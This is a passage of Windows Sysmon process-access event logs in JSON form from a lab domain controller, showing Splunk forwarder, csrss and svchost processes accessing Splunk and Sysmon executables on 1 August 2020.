AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8","ParentProcessGuid":"{41C8662E-1FF3-5F25-0000-00109F540500}","ParentProcessId":"4576","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 08:03:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6512,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:40.711\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nSourceProcessId: 4576\r\nSourceThreadId: 2580\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {41C8662E-21DC-5F25-0000-0010DB1E0A00}\r\nTargetProcessId: 2152\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:40.711","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","SourceProcessId":"4576","SourceThreadId":"2580","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{41C8662E-21DC-5F25-0000-0010DB1E0A00}","TargetProcessId":"2152","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6513,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:40.711\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2340\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-21DC-5F25-0000-0010DB1E0A00}\r\nTargetProcessId: 2152\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:40.711","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2340","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-21DC-5F25-0000-0010DB1E0A00}","TargetProcessId":"2152","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:03:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6514,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:40.711\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:40.711","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6515,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:40.711\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:40.711","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6516,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:40.711\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:40.711","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6517,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:40.711\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:40.711","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6518,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:40.711\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:40.711","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6519,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:40.711\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:40.711","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
